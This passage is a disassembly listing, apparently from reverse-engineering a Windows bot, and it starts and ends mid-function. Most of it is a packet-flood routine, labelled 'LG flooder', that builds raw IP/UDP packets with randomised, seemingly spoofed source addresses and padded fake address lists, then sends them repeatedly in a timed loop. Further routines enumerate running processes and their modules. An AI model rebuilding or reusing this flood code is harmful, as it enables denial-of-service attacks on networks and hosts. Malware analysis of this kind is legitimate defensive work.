lea eax, [ebp+var_108D]
push eax
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_118D]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405710
lea eax, [ebp+var_118D]
push eax
call ds:dword_41723C ; gethostbyname
mov [ebp+var_1344], eax
cmp [ebp+var_1344], 0
jnz short loc_405700
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405700: ; CODE XREF: sub_4055E5+106�j
mov eax, [ebp+var_1344]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
loc_405710: ; CODE XREF: sub_4055E5+EA�j
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405729
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405729: ; CODE XREF: sub_4055E5+12F�j
push 1060h
push 0
lea eax, [ebp+var_1074]
push eax
call sub_416B6A ; memset
add esp, 0Ch
lea eax, [ebp+var_1074]
mov [ebp+var_133C], eax
lea eax, [ebp+var_1058]
mov [ebp+var_14], eax
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0F0h
or al, 5
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0Fh
or al, 40h
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov byte ptr [eax+9], 11h
mov eax, [ebp+var_133C]
mov ecx, [ebp+var_C]
mov [eax+10h], ecx
mov eax, [ebp+var_133C]
mov cx, [ebp+var_E]
mov [eax+16h], cx
and [ebp+var_1338], 0
jmp short loc_4057B6
; ---------------------------------------------------------------------------
loc_4057A9: ; CODE XREF: sub_4055E5:loc_405E22�j
mov eax, [ebp+var_1338]
inc eax
mov [ebp+var_1338], eax
loc_4057B6: ; CODE XREF: sub_4055E5+1C2�j
mov eax, [ebp+var_1338]
cmp eax, [ebp+var_1087]
jge loc_405E27
mov eax, [ebp+var_107F]
mov [ebp+var_1358], eax
cmp [ebp+var_1358], 1
jz short loc_4057FC
cmp [ebp+var_1358], 2
jz loc_405924
cmp [ebp+var_1358], 3
jz loc_405A11
jmp loc_405C71
; ---------------------------------------------------------------------------
loc_4057FC: ; CODE XREF: sub_4055E5+1F6�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_40581E: ; CODE XREF: sub_4055E5+2BF�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4058A9
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_40581E
; ---------------------------------------------------------------------------
loc_4058A9: ; CODE XREF: sub_4055E5+247�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405924: ; CODE XREF: sub_4055E5+1FF�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405946: ; CODE XREF: sub_4055E5+3CB�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4059B2
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405946
; ---------------------------------------------------------------------------
loc_4059B2: ; CODE XREF: sub_4055E5+36F�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405A11: ; CODE XREF: sub_4055E5+20C�j
push 2
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_134C], eax
cmp [ebp+var_134C], 0
jnz short loc_405A52
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405A52: ; CODE XREF: sub_4055E5+444�j
cmp [ebp+var_134C], 1
jnz loc_405B87
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405A81: ; CODE XREF: sub_4055E5+522�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405B0C
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405A81
; ---------------------------------------------------------------------------
loc_405B0C: ; CODE XREF: sub_4055E5+4AA�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405B87: ; CODE XREF: sub_4055E5+474�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405BA9: ; CODE XREF: sub_4055E5+62E�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405C15
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405BA9
; ---------------------------------------------------------------------------
loc_405C15: ; CODE XREF: sub_4055E5+5D2�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
loc_405C6F: ; CODE XREF: sub_4055E5+468�j
; sub_4055E5+59D�j
jmp short loc_405C93
; ---------------------------------------------------------------------------
loc_405C71: ; CODE XREF: sub_4055E5+212�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405C93: ; CODE XREF: sub_4055E5+33A�j
; sub_4055E5+427�j ...
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_1354], eax
and [ebp+var_1350], 0
jmp short loc_405CB8
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_4055E5+6F9�j
mov eax, [ebp+var_1350]
inc eax
mov [ebp+var_1350], eax
loc_405CB8: ; CODE XREF: sub_4055E5+6C4�j
mov eax, [ebp+var_1350]
cmp eax, [ebp+var_1354]
jnb short loc_405CE0
mov eax, [ebp+var_14]
add eax, [ebp+var_1350]
mov al, [eax]
shl al, 1
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1350]
mov [ecx], al
jmp short loc_405CAB
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: sub_4055E5+6DF�j
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
call ds:dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+2], ax
call sub_41043F
push eax
call ds:dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+4], ax
call sub_410483
neg eax
sbb eax, eax
and al, 0C0h
add eax, 80h
mov ecx, [ebp+var_133C]
mov [ecx+8], al
push 2
push offset dword_41F018
call ds:dword_417244 ; inet_addr
push eax
call sub_4040E8
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ch], eax
mov eax, [ebp+var_1354]
add eax, 14h
push eax
push [ebp+var_133C]
call sub_40407D
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ah], ax
movzx eax, [ebp+var_E]
test eax, eax
jnz short loc_405D7F
call sub_41043F
mov ecx, [ebp+var_133C]
mov [ecx+16h], ax
loc_405D7F: ; CODE XREF: sub_4055E5+789�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call ds:dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+14h], ax
mov eax, [ebp+var_1354]
add eax, 8
push eax
call ds:dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+18h], ax
push 10h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
lea eax, [ebp+var_1074]
push eax
push [ebp+var_1078]
call ds:dword_417250 ; sendto
mov [ebp+var_1348], eax
cmp [ebp+var_1348], 0FFFFFFFFh
jnz short loc_405E08
push [ebp+var_1334]
call sub_409763
pop ecx
push [ebp+var_1078]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_405E41
; ---------------------------------------------------------------------------
loc_405E08: ; CODE XREF: sub_4055E5+805�j
push [ebp+var_1083]
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1334]
cmp dword ptr [eax+4], 0
jz short loc_405E22
jmp short loc_405E27
; ---------------------------------------------------------------------------
loc_405E22: ; CODE XREF: sub_4055E5+839�j
jmp loc_4057A9
; ---------------------------------------------------------------------------
loc_405E27: ; CODE XREF: sub_4055E5+1DD�j
; sub_4055E5+83B�j
push [ebp+var_1078]
call sub_4053B1
pop ecx
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
locret_405E41: ; CODE XREF: sub_4055E5+59�j
; sub_4055E5+94�j ...
leave
retn 4
sub_4055E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E45 proc near ; CODE XREF: sub_40A9CF+8B2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_405E5D
cmp [ebp+arg_8], 0
jz short loc_405E5D
cmp [ebp+arg_14], 0
jnz short loc_405E62
loc_405E5D: ; CODE XREF: sub_405E45+A�j
; sub_405E45+10�j
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E62: ; CODE XREF: sub_405E45+16�j
push 2B9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405E7B
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E7B: ; CODE XREF: sub_405E45+2F�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A7h
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 2A7h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2ADh], eax
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B1h], eax
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B5h], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 0EA60h
jge short loc_405F0E
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_8], eax
jmp short loc_405F15
; ---------------------------------------------------------------------------
loc_405F0E: ; CODE XREF: sub_405E45+B9�j
mov [ebp+var_8], 0EA60h
loc_405F15: ; CODE XREF: sub_405E45+C7�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+2B1h], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 64h
jle short loc_405F3B
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_C], eax
jmp short loc_405F42
; ---------------------------------------------------------------------------
loc_405F3B: ; CODE XREF: sub_405E45+E6�j
mov [ebp+var_C], 64h
loc_405F42: ; CODE XREF: sub_405E45+F4�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+2B1h], ecx
push offset aLgFlooder ; "LG flooder"
push 0
push [ebp+var_4]
push offset sub_4055E5
call sub_4095A4
add esp, 10h
locret_405F65: ; CODE XREF: sub_405E45:loc_405E5D�j
; sub_405E45+31�j
leave
retn
sub_405E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F67 proc near ; CODE XREF: sub_4017AA+6E�p
; sub_401D6E+77�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_405F8E
push 1A3h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_0]
mov byte ptr [eax+198h], 1
jmp short loc_405FA1
; ---------------------------------------------------------------------------
loc_405F8E: ; CODE XREF: sub_405F67+7�j
push 1A3h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
loc_405FA1: ; CODE XREF: sub_405F67+25�j
pop ebp
retn
sub_405F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FA3 proc near ; CODE XREF: UPX0:004168C1�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push offset dword_41E380
call sub_409C36
pop ecx
push offset aPsapi_dll ; "psapi.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405FC8
jmp short locret_40603F
; ---------------------------------------------------------------------------
loc_405FC8: ; CODE XREF: sub_405FA3+21�j
push offset aEnumprocesses ; "EnumProcesses"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E37C, eax
push offset aEnumprocessmod ; "EnumProcessModules"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E370, eax
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E374, eax
push offset aGetmoduleinfor ; "GetModuleInformation"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E378, eax
cmp ds:dword_41E37C, 0
jz short locret_40603F
cmp ds:dword_41E370, 0
jz short locret_40603F
cmp ds:dword_41E374, 0
jz short locret_40603F
cmp ds:dword_41E378, 0
jz short locret_40603F
mov ds:byte_41E39C, 1
locret_40603F: ; CODE XREF: sub_405FA3+23�j
; sub_405FA3+78�j ...
leave
retn
sub_405FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406041 proc near ; CODE XREF: sub_401244:loc_40129D�p
; sub_40637C+29�p
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_12B = byte ptr -12Bh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset dword_41E380
call sub_409C6C
pop ecx
movzx eax, ds:byte_41E39C
test eax, eax
jnz short loc_406074
push offset dword_41E380
call sub_409C7A
pop ecx
xor eax, eax
jmp loc_40636A
; ---------------------------------------------------------------------------
loc_406074: ; CODE XREF: sub_406041+1F�j
and [ebp+var_C], 0
and [ebp+var_4], 0
and [ebp+var_1C], 0
push [ebp+var_1C]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_406097
jmp loc_406368
; ---------------------------------------------------------------------------
loc_406097: ; CODE XREF: sub_406041+4F�j
; sub_406041:loc_4060E9�j
mov eax, [ebp+var_1C]
add eax, 80h
mov [ebp+var_1C], eax
push [ebp+var_1C]
push [ebp+var_14]
call sub_416BF6 ; realloc
pop ecx
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4060BD
jmp loc_406366
; ---------------------------------------------------------------------------
loc_4060BD: ; CODE XREF: sub_406041+75�j
lea eax, [ebp+var_4]
push eax
push [ebp+var_1C]
push [ebp+var_14]
call ds:dword_41E37C
test eax, eax
jnz short loc_4060DF
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406364
; ---------------------------------------------------------------------------
loc_4060DF: ; CODE XREF: sub_406041+8E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
jnb short loc_4060E9
jmp short loc_4060EB
; ---------------------------------------------------------------------------
loc_4060E9: ; CODE XREF: sub_406041+A4�j
jmp short loc_406097
; ---------------------------------------------------------------------------
loc_4060EB: ; CODE XREF: sub_406041+A6�j
mov eax, [ebp+var_4]
shr eax, 2
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
imul eax, 114h
add eax, 8
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40611E
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406362
; ---------------------------------------------------------------------------
loc_40611E: ; CODE XREF: sub_406041+CD�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov eax, [ebp+var_C]
add eax, 8
mov ecx, [ebp+var_C]
mov [ecx+4], eax
and [ebp+var_10], 0
jmp short loc_40613F
; ---------------------------------------------------------------------------
loc_406138: ; CODE XREF: sub_406041+156�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_40613F: ; CODE XREF: sub_406041+F5�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb short loc_406199
push 114h
push 0
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_10]
mov esi, [ebp+var_14]
mov edx, [esi+edx*4]
mov [ecx+eax], edx
push offset aSystem ; "system"
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_406138
; ---------------------------------------------------------------------------
loc_406199: ; CODE XREF: sub_406041+104�j
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
and [ebp+var_10], 0
jmp short loc_4061AF
; ---------------------------------------------------------------------------
loc_4061A8: ; CODE XREF: sub_406041+1A8�j
; sub_406041+1D8�j ...
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4061AF: ; CODE XREF: sub_406041+165�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb loc_406343
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
push 410h
call ds:dword_417094 ; OpenProcess
mov [ebp+var_130], eax
cmp [ebp+var_130], 0
jnz short loc_4061EB
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_4061EB: ; CODE XREF: sub_406041+1A6�j
and [ebp+var_20], 0
and [ebp+var_28], 0
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_28]
push eax
push [ebp+var_130]
call ds:dword_41E370
test eax, eax
jnz short loc_40621B
push [ebp+var_130]
call ds:dword_4170A4 ; CloseHandle
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_40621B: ; CODE XREF: sub_406041+1CA�j
push 0Ch
lea eax, [ebp+var_13C]
push eax
push [ebp+var_28]
push [ebp+var_130]
call ds:dword_41E378
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_13C]
mov [ecx+eax+4], edx
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_138]
mov [ecx+eax+8], edx
mov al, ds:byte_41DF00
mov [ebp+var_12C], al
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_12B]
rep stosd
stosw
stosb
push 104h
lea eax, [ebp+var_12C]
push eax
push [ebp+var_13C]
push [ebp+var_130]
call ds:dword_41E374
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_406332
movsx eax, [ebp+var_12C]
test eax, eax
jz short loc_406332
push 104h
lea eax, [ebp+var_12C]
push eax
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_12C]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_18], eax
jmp short loc_4062F7
; ---------------------------------------------------------------------------
loc_4062F0: ; CODE XREF: sub_406041:loc_406330�j
mov eax, [ebp+var_18]
dec eax
mov [ebp+var_18], eax
loc_4062F7: ; CODE XREF: sub_406041+2AD�j
cmp [ebp+var_18], 0
jz short loc_406332
cmp [ebp+var_18], 1
ja short loc_406305
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406305: ; CODE XREF: sub_406041+2C0�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [ebp+eax+var_130+3]
cmp eax, 5Ch
jnz short loc_406330
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_18]
mov [ecx+eax+110h], edx
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_406041+2D2�j
jmp short loc_4062F0
; ---------------------------------------------------------------------------
loc_406332: ; CODE XREF: sub_406041+264�j
; sub_406041+273�j ...
push [ebp+var_130]
call ds:dword_4170A4 ; CloseHandle
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406343: ; CODE XREF: sub_406041+174�j
push offset dword_41E380
call sub_409C7A
pop ecx
mov eax, [ebp+var_C]
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406353: ; CODE XREF: sub_406041:loc_406362�j
; sub_406041:loc_406364�j ...
push offset dword_41E380
call sub_409C7A
pop ecx
xor eax, eax
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406362: ; CODE XREF: sub_406041+D8�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406364: ; CODE XREF: sub_406041+99�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406366: ; CODE XREF: sub_406041+77�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406368: ; CODE XREF: sub_406041+51�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_40636A: ; CODE XREF: sub_406041+2E�j
; sub_406041+310�j ...
pop edi
pop esi
leave
retn
sub_406041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40636E proc near ; CODE XREF: sub_401244+4D2�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_40636E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40637C proc near ; DATA XREF: sub_4064BF+3B�o
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_406041
mov [ebp+var_1AC], eax
cmp [ebp+var_1AC], 0
jz loc_4064AD
mov eax, [ebp+var_1AC]
push dword ptr [eax]
mov eax, [ebp+var_1A8]
push dword ptr [eax]
push offset dword_418B1C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1B0], 0
jmp short loc_4063F7
; ---------------------------------------------------------------------------
loc_4063EA: ; CODE XREF: sub_40637C:loc_40649C�j
mov eax, [ebp+var_1B0]
inc eax
mov [ebp+var_1B0], eax
loc_4063F7: ; CODE XREF: sub_40637C+6C�j
mov eax, [ebp+var_1AC]
mov ecx, [ebp+var_1B0]
cmp ecx, [eax]
jge loc_4064A1
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+8]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+4]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push offset dword_418B04
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
mov eax, [ebp+var_1A8]
cmp dword ptr [eax+4], 0
jz short loc_40649C
jmp short loc_4064A1
; ---------------------------------------------------------------------------
loc_40649C: ; CODE XREF: sub_40637C+11C�j
jmp loc_4063EA
; ---------------------------------------------------------------------------
loc_4064A1: ; CODE XREF: sub_40637C+89�j
